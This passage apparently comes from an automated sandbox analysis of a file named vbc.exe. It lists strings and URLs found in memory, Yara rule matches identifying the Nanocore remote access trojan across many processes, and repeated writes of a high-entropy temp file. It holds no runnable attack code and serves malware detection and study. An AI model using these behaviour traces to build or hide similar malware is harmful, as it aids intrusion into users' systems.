        Source: vbc.exe, 00000006.00000002.2177181364.0000000002B90000.00000002.00000001.sdmp, vbc.exe, 00000008.00000002.2192380322.0000000002BC0000.00000002.00000001.sdmpString found in binary or memory: http://investor.msn.com
        Source: vbc.exe, 00000006.00000002.2177181364.0000000002B90000.00000002.00000001.sdmp, vbc.exe, 00000008.00000002.2192380322.0000000002BC0000.00000002.00000001.sdmpString found in binary or memory: http://investor.msn.com/
        Source: vbc.exe, 00000006.00000002.2177387139.0000000002D77000.00000002.00000001.sdmp, vbc.exe, 00000008.00000002.2192741751.0000000002DA7000.00000002.00000001.sdmpString found in binary or memory: http://localizability/practices/XML.asp
        Source: vbc.exe, 00000006.00000002.2177387139.0000000002D77000.00000002.00000001.sdmp, vbc.exe, 00000008.00000002.2192741751.0000000002DA7000.00000002.00000001.sdmpString found in binary or memory: http://localizability/practices/XMLConfiguration.asp
        Source: vbc.exe, vbc.exe, 00000004.00000002.2162200762.000000000040A000.00000004.00020000.sdmp, vbc.exe, 00000006.00000000.2161802595.000000000040A000.00000008.00020000.sdmp, vbc.exe, 00000008.00000002.2189440856.000000000040A000.00000004.00020000.sdmp, vbc.exe, 0000000A.00000002.2201161268.000000000040A000.00000004.00020000.sdmp, vbc.exe, 0000000C.00000002.2216255904.000000000040A000.00000004.00020000.sdmpString found in binary or memory: http://nsis.sf.net/NSIS_Error
        Source: vbc.exe, 00000004.00000002.2162200762.000000000040A000.00000004.00020000.sdmp, vbc.exe, 00000006.00000000.2161802595.000000000040A000.00000008.00020000.sdmp, vbc.exe, 00000008.00000002.2189440856.000000000040A000.00000004.00020000.sdmp, vbc.exe, 0000000A.00000002.2201161268.000000000040A000.00000004.00020000.sdmp, vbc.exe, 0000000C.00000002.2216255904.000000000040A000.00000004.00020000.sdmpString found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
        Source: vbc.exe, 00000004.00000002.2162506634.0000000001DC0000.00000002.00000001.sdmp, vbc.exe, 00000006.00000002.2176037338.00000000020E0000.00000002.00000001.sdmp, vbc.exe, 00000008.00000002.2190288493.0000000001F10000.00000002.00000001.sdmp, vbc.exe, 00000020.00000002.2360706938.0000000001E10000.00000002.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous.
        Source: vbc.exe, 00000006.00000002.2177387139.0000000002D77000.00000002.00000001.sdmp, vbc.exe, 00000008.00000002.2192741751.0000000002DA7000.00000002.00000001.sdmpString found in binary or memory: http://services.msn.com/svcs/oe/certpage.asp?name=%s&email=%s&&Check
        Source: vbc.exe, 00000006.00000002.2177387139.0000000002D77000.00000002.00000001.sdmp, vbc.exe, 00000008.00000002.2192741751.0000000002DA7000.00000002.00000001.sdmpString found in binary or memory: http://windowsmedia.com/redir/services.asp?WMPFriendly=true
        Source: vbc.exe, 00000004.00000002.2162506634.0000000001DC0000.00000002.00000001.sdmp, vbc.exe, 00000006.00000002.2176037338.00000000020E0000.00000002.00000001.sdmp, vbc.exe, 00000008.00000002.2190288493.0000000001F10000.00000002.00000001.sdmp, vbc.exe, 00000020.00000002.2360706938.0000000001E10000.00000002.00000001.sdmpString found in binary or memory: http://www.%s.comPA
        Source: vbc.exe, 00000006.00000002.2177181364.0000000002B90000.00000002.00000001.sdmp, vbc.exe, 00000008.00000002.2192380322.0000000002BC0000.00000002.00000001.sdmpString found in binary or memory: http://www.hotmail.com/oe
        Source: vbc.exe, 00000006.00000002.2177387139.0000000002D77000.00000002.00000001.sdmp, vbc.exe, 00000008.00000002.2192741751.0000000002DA7000.00000002.00000001.sdmpString found in binary or memory: http://www.icra.org/vocabulary/.
        Source: vbc.exe, 00000006.00000002.2177181364.0000000002B90000.00000002.00000001.sdmp, vbc.exe, 00000008.00000002.2192380322.0000000002BC0000.00000002.00000001.sdmpString found in binary or memory: http://www.msnbc.com/news/ticker.txt
        Source: vbc.exe, 0000000A.00000002.2202157989.0000000002B60000.00000002.00000001.sdmpString found in binary or memory: http://www.windows.com/pctv.
        Source: C:\Users\Public\vbc.exeCode function: 4_2_0040548D GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,GetClientRect,GetSystemMetrics,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SendMessageA,ShowWindow,ShowWindow,GetDlgItem,SendMessageA,SendMessageA,SendMessageA,GetDlgItem,CreateThread,CloseHandle,ShowWindow,ShowWindow,ShowWindow,ShowWindow,SendMessageA,CreatePopupMenu,AppendMenuA,GetWindowRect,TrackPopupMenu,SendMessageA,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageA,GlobalUnlock,SetClipboardData,CloseClipboard,

        E-Banking Fraud:

        barindex
        Yara detected Nanocore RATShow sources
        Source: Yara matchFile source: 00000018.00000002.2302975207.00000000027F2000.00000040.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 0000001D.00000002.2321994260.0000000000402000.00000040.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000018.00000002.2302925101.0000000002760000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000012.00000002.2258235244.0000000001E90000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 0000000C.00000002.2216316661.0000000000440000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000014.00000002.2273346019.0000000002760000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 0000000F.00000002.2222957542.0000000000402000.00000040.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 0000001A.00000002.2316058647.00000000027E2000.00000040.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000022.00000002.2368425680.0000000002780000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000017.00000002.2279056519.0000000000402000.00000040.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000005.00000002.2150412960.0000000000402000.00000040.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 0000000E.00000002.2231524539.0000000002862000.00000040.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000007.00000002.2168675163.0000000000402000.00000040.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 0000000C.00000002.2216660226.0000000001F12000.00000040.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000020.00000002.2362066898.0000000002870000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 0000001B.00000002.2307464017.0000000000402000.00000040.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 0000001A.00000002.2315962190.0000000002750000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 0000000E.00000002.2231421251.0000000002750000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000016.00000002.2287694546.00000000027C0000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 0000000D.00000002.2208178016.0000000000402000.00000040.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000009.00000002.2181664137.0000000000402000.00000040.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000004.00000002.2163268669.0000000002680000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000006.00000002.2176935258.00000000027A0000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 0000001E.00000002.2347167149.0000000002832000.00000040.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 0000001C.00000002.2329560547.00000000005F0000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000019.00000002.2292417320.0000000000402000.00000040.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000004.00000002.2163468304.00000000030A2000.00000040.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000008.00000002.2191917779.00000000027D0000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000010.00000002.2245905137.0000000002780000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 0000001E.00000002.2346463875.0000000002750000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000016.00000002.2287767683.0000000002852000.00000040.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000006.00000002.2177049947.0000000002832000.00000040.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000015.00000002.2264948911.0000000000402000.00000040.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 0000001C.00000002.2330418460.0000000002942000.00000040.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000008.00000002.2192149288.0000000002862000.00000040.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 0000000A.00000002.2202107255.0000000002770000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000014.00000002.2273452074.00000000027F2000.00000040.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 0000001F.00000002.2337833503.0000000000402000.00000040.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: Process Memory Space: MSBuild.exe PID: 2544, type: MEMORY
        Source: Yara matchFile source: Process Memory Space: MSBuild.exe PID: 2872, type: MEMORY
        Source: Yara matchFile source: Process Memory Space: vbc.exe PID: 2780, type: MEMORY
        Source: Yara matchFile source: 24.2.vbc.exe.2760000.6.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 20.2.vbc.exe.2760000.6.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 8.2.vbc.exe.2860000.7.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 6.2.vbc.exe.27a0000.6.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 18.2.vbc.exe.1e90000.3.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 28.2.vbc.exe.5f0000.3.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 32.2.vbc.exe.2870000.6.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 14.2.vbc.exe.2750000.6.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 26.2.vbc.exe.2750000.6.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 22.2.vbc.exe.27c0000.6.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 23.2.MSBuild.exe.400000.0.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 13.2.MSBuild.exe.400000.0.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 22.2.vbc.exe.27c0000.6.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 6.2.vbc.exe.2830000.7.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 5.2.MSBuild.exe.400000.0.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 15.2.MSBuild.exe.400000.0.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 18.2.vbc.exe.1e90000.3.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 14.2.vbc.exe.2860000.7.unpack, type: UNPACKEDPE

        Spam, unwanted Advertisements and Ransom Demands:

        barindex
        Writes many files with high entropyShow sources
        Source: C:\Users\Public\vbc.exeFile created: C:\Users\user\AppData\Local\Temp\9cmllaqc7s94x5clckyk entropy: 7.99967667297
        Source: C:\Users\Public\vbc.exeFile created: C:\Users\user\AppData\Local\Temp\9cmllaqc7s94x5clckyk entropy: 7.99967667297
        Source: C:\Users\Public\vbc.exeFile created: C:\Users\user\AppData\Local\Temp\9cmllaqc7s94x5clckyk entropy: 7.99967667297
        Source: C:\Users\Public\vbc.exeFile created: C:\Users\user\AppData\Local\Temp\9cmllaqc7s94x5clckyk entropy: 7.99967667297
        Source: C:\Users\Public\vbc.exeFile created: C:\Users\user\AppData\Local\Temp\9cmllaqc7s94x5clckyk entropy: 7.99967667297
        Source: C:\Users\Public\vbc.exeFile created: C:\Users\user\AppData\Local\Temp\9cmllaqc7s94x5clckyk entropy: 7.99967667297
        Source: C:\Users\Public\vbc.exeFile created: C:\Users\user\AppData\Local\Temp\9cmllaqc7s94x5clckyk entropy: 7.99967667297
        Source: C:\Users\Public\vbc.exeFile created: C:\Users\user\AppData\Local\Temp\9cmllaqc7s94x5clckyk entropy: 7.99967667297
        Source: C:\Users\Public\vbc.exeFile created: C:\Users\user\AppData\Local\Temp\9cmllaqc7s94x5clckyk entropy: 7.99967667297
        Source: C:\Users\Public\vbc.exeFile created: C:\Users\user\AppData\Local\Temp\9cmllaqc7s94x5clckyk entropy: 7.99967667297
        Source: C:\Users\Public\vbc.exeFile created: C:\Users\user\AppData\Local\Temp\9cmllaqc7s94x5clckyk entropy: 7.99967667297
        Source: C:\Users\Public\vbc.exeFile created: C:\Users\user\AppData\Local\Temp\9cmllaqc7s94x5clckyk entropy: 7.99967667297
        Source: C:\Users\Public\vbc.exeFile created: C:\Users\user\AppData\Local\Temp\9cmllaqc7s94x5clckyk entropy: 7.99967667297
        Source: C:\Users\Public\vbc.exeFile created: C:\Users\user\AppData\Local\Temp\9cmllaqc7s94x5clckyk entropy: 7.99967667297
        Source: C:\Users\Public\vbc.exeFile created: C:\Users\user\AppData\Local\Temp\9cmllaqc7s94x5clckyk entropy: 7.99967667297
        Source: C:\Users\Public\vbc.exeFile created: C:\Users\user\AppData\Local\Temp\9cmllaqc7s94x5clckyk entropy: 7.99967667297Jump to dropped file

        System Summary:

        barindex
        Malicious sample detected (through community Yara rule)Show sources
        Source: 00000018.00000002.2302975207.00000000027F2000.00000040.00000001.sdmp, type: MEMORYMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: 00000018.00000002.2302975207.00000000027F2000.00000040.00000001.sdmp, type: MEMORYMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
        Source: 0000001D.00000002.2321994260.0000000000402000.00000040.00000001.sdmp, type: MEMORYMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: 0000001D.00000002.2321994260.0000000000402000.00000040.00000001.sdmp, type: MEMORYMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
        Source: 00000018.00000002.2302925101.0000000002760000.00000004.00000001.sdmp, type: MEMORYMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: 00000018.00000002.2302925101.0000000002760000.00000004.00000001.sdmp, type: MEMORYMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
        Source: 00000012.00000002.2258235244.0000000001E90000.00000004.00000001.sdmp, type: MEMORYMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: 00000012.00000002.2258235244.0000000001E90000.00000004.00000001.sdmp, type: MEMORYMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
        Source: 0000000C.00000002.2216316661.0000000000440000.00000004.00000001.sdmp, type: MEMORYMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: 0000000C.00000002.2216316661.0000000000440000.00000004.00000001.sdmp, type: MEMORYMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
        Source: 00000014.00000002.2273346019.0000000002760000.00000004.00000001.sdmp, type: MEMORYMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: 00000014.00000002.2273346019.0000000002760000.00000004.00000001.sdmp, type: MEMORYMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
        Source: 0000000F.00000002.2222957542.0000000000402000.00000040.00000001.sdmp, type: MEMORYMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: 0000000F.00000002.2222957542.0000000000402000.00000040.00000001.sdmp, type: MEMORYMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
        Source: 0000001A.00000002.2316058647.00000000027E2000.00000040.00000001.sdmp, type: MEMORYMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: 0000001A.00000002.2316058647.00000000027E2000.00000040.00000001.sdmp, type: MEMORYMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
        Source: 00000022.00000002.2368425680.0000000002780000.00000004.00000001.sdmp, type: MEMORYMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: 00000022.00000002.2368425680.0000000002780000.00000004.00000001.sdmp, type: MEMORYMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
        Source: 00000017.00000002.2279056519.0000000000402000.00000040.00000001.sdmp, type: MEMORYMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: 00000017.00000002.2279056519.0000000000402000.00000040.00000001.sdmp, type: MEMORYMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
        Source: 00000005.00000002.2150412960.0000000000402000.00000040.00000001.sdmp, type: MEMORYMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: 00000005.00000002.2150412960.0000000000402000.00000040.00000001.sdmp, type: MEMORYMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
        Source: 0000000E.00000002.2231524539.0000000002862000.00000040.00000001.sdmp, type: MEMORYMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: 0000000E.00000002.2231524539.0000000002862000.00000040.00000001.sdmp, type: MEMORYMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
        Source: 00000007.00000002.2168675163.0000000000402000.00000040.00000001.sdmp, type: MEMORYMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: 00000007.00000002.2168675163.0000000000402000.00000040.00000001.sdmp, type: MEMORYMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
        Source: 0000000C.00000002.2216660226.0000000001F12000.00000040.00000001.sdmp, type: MEMORYMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: 0000000C.00000002.2216660226.0000000001F12000.00000040.00000001.sdmp, type: MEMORYMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
        Source: 00000020.00000002.2362066898.0000000002870000.00000004.00000001.sdmp, type: MEMORYMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: 00000020.00000002.2362066898.0000000002870000.00000004.00000001.sdmp, type: MEMORYMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
        Source: 0000001B.00000002.2307464017.0000000000402000.00000040.00000001.sdmp, type: MEMORYMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: 0000001B.00000002.2307464017.0000000000402000.00000040.00000001.sdmp, type: MEMORYMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
        Source: 0000001A.00000002.2315962190.0000000002750000.00000004.00000001.sdmp, type: MEMORYMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: 0000001A.00000002.2315962190.0000000002750000.00000004.00000001.sdmp, type: MEMORYMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
        Source: 0000000E.00000002.2231421251.0000000002750000.00000004.00000001.sdmp, type: MEMORYMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: 0000000E.00000002.2231421251.0000000002750000.00000004.00000001.sdmp, type: MEMORYMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
        Source: 00000016.00000002.2287694546.00000000027C0000.00000004.00000001.sdmp, type: MEMORYMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: 00000016.00000002.2287694546.00000000027C0000.00000004.00000001.sdmp, type: MEMORYMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
        Source: 0000000D.00000002.2208178016.0000000000402000.00000040.00000001.sdmp, type: MEMORYMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: 0000000D.00000002.2208178016.0000000000402000.00000040.00000001.sdmp, type: MEMORYMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
        Source: 00000009.00000002.2181664137.0000000000402000.00000040.00000001.sdmp, type: MEMORYMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: 00000009.00000002.2181664137.0000000000402000.00000040.00000001.sdmp, type: MEMORYMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
        Source: 00000004.00000002.2163268669.0000000002680000.00000004.00000001.sdmp, type: MEMORYMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: 00000004.00000002.2163268669.0000000002680000.00000004.00000001.sdmp, type: MEMORYMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
        Source: 00000006.00000002.2176935258.00000000027A0000.00000004.00000001.sdmp, type: MEMORYMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: 00000006.00000002.2176935258.00000000027A0000.00000004.00000001.sdmp, type: MEMORYMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
        Source: 0000001E.00000002.2347167149.0000000002832000.00000040.00000001.sdmp, type: MEMORYMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: 0000001E.00000002.2347167149.0000000002832000.00000040.00000001.sdmp, type: MEMORYMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
        Source: 0000001C.00000002.2329560547.00000000005F0000.00000004.00000001.sdmp, type: MEMORYMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: 0000001C.00000002.2329560547.00000000005F0000.00000004.00000001.sdmp, type: MEMORYMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
        Source: 00000019.00000002.2292417320.0000000000402000.00000040.00000001.sdmp, type: MEMORYMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: 00000019.00000002.2292417320.0000000000402000.00000040.00000001.sdmp, type: MEMORYMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
        Source: 00000004.00000002.2163468304.00000000030A2000.00000040.00000001.sdmp, type: MEMORYMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: 00000004.00000002.2163468304.00000000030A2000.00000040.00000001.sdmp, type: MEMORYMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
        Source: 00000008.00000002.2191917779.00000000027D0000.00000004.00000001.sdmp, type: MEMORYMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: 00000008.00000002.2191917779.00000000027D0000.00000004.00000001.sdmp, type: MEMORYMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
        Source: 00000010.00000002.2245905137.0000000002780000.00000004.00000001.sdmp, type: MEMORYMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: 00000010.00000002.2245905137.0000000002780000.00000004.00000001.sdmp, type: MEMORYMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
        Source: 0000001E.00000002.2346463875.0000000002750000.00000004.00000001.sdmp, type: MEMORYMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: 0000001E.00000002.2346463875.0000000002750000.00000004.00000001.sdmp, type: MEMORYMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
        Source: 00000016.00000002.2287767683.0000000002852000.00000040.00000001.sdmp, type: MEMORYMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: 00000016.00000002.2287767683.0000000002852000.00000040.00000001.sdmp, type: MEMORYMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
        Source: 00000006.00000002.2177049947.0000000002832000.00000040.00000001.sdmp, type: MEMORYMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: 00000006.00000002.2177049947.0000000002832000.00000040.00000001.sdmp, type: MEMORYMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
        Source: 00000015.00000002.2264948911.0000000000402000.00000040.00000001.sdmp, type: MEMORYMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: 00000015.00000002.2264948911.0000000000402000.00000040.00000001.sdmp, type: MEMORYMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
        Source: 0000001C.00000002.2330418460.0000000002942000.00000040.00000001.sdmp, type: MEMORYMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: 0000001C.00000002.2330418460.0000000002942000.00000040.00000001.sdmp, type: MEMORYMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
        Source: 00000008.00000002.2192149288.0000000002862000.00000040.00000001.sdmp, type: MEMORYMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: 00000008.00000002.2192149288.0000000002862000.00000040.00000001.sdmp, type: MEMORYMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
        Source: 0000000A.00000002.2202107255.0000000002770000.00000004.00000001.sdmp, type: MEMORYMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: 0000000A.00000002.2202107255.0000000002770000.00000004.00000001.sdmp, type: MEMORYMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
        Source: 00000014.00000002.2273452074.00000000027F2000.00000040.00000001.sdmp, type: MEMORYMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: 00000014.00000002.2273452074.00000000027F2000.00000040.00000001.sdmp, type: MEMORYMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
        Source: 0000001F.00000002.2337833503.0000000000402000.00000040.00000001.sdmp, type: MEMORYMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: 0000001F.00000002.2337833503.0000000000402000.00000040.00000001.sdmp, type: MEMORYMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
        Source: Process Memory Space: MSBuild.exe PID: 2544, type: MEMORYMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: Process Memory Space: MSBuild.exe PID: 2544, type: MEMORYMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
        Source: Process Memory Space: MSBuild.exe PID: 2872, type: MEMORYMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: Process Memory Space: MSBuild.exe PID: 2872, type: MEMORYMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
        Source: Process Memory Space: vbc.exe PID: 2780, type: MEMORYMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: Process Memory Space: vbc.exe PID: 2780, type: MEMORYMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
        Source: 24.2.vbc.exe.2760000.6.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: 24.2.vbc.exe.2760000.6.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
        Source: 20.2.vbc.exe.2760000.6.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: 20.2.vbc.exe.2760000.6.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
        Source: 8.2.vbc.exe.2860000.7.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: 8.2.vbc.exe.2860000.7.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
        Source: 6.2.vbc.exe.27a0000.6.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: 6.2.vbc.exe.27a0000.6.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
        Source: 18.2.vbc.exe.1e90000.3.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: 18.2.vbc.exe.1e90000.3.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
        Source: 28.2.vbc.exe.5f0000.3.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: 28.2.vbc.exe.5f0000.3.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
        Source: 32.2.vbc.exe.2870000.6.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: 32.2.vbc.exe.2870000.6.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
        Source: 14.2.vbc.exe.2750000.6.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: 14.2.vbc.exe.2750000.6.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
        Source: 26.2.vbc.exe.2750000.6.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: 26.2.vbc.exe.2750000.6.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
        Source: 22.2.vbc.exe.27c0000.6.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: 22.2.vbc.exe.27c0000.6.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
        Source: 23.2.MSBuild.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: 23.2.MSBuild.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
        Source: 13.2.MSBuild.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: 13.2.MSBuild.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
        Source: 22.2.vbc.exe.27c0000.6.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: 22.2.vbc.exe.27c0000.6.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
        Source: 6.2.vbc.exe.2830000.7.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
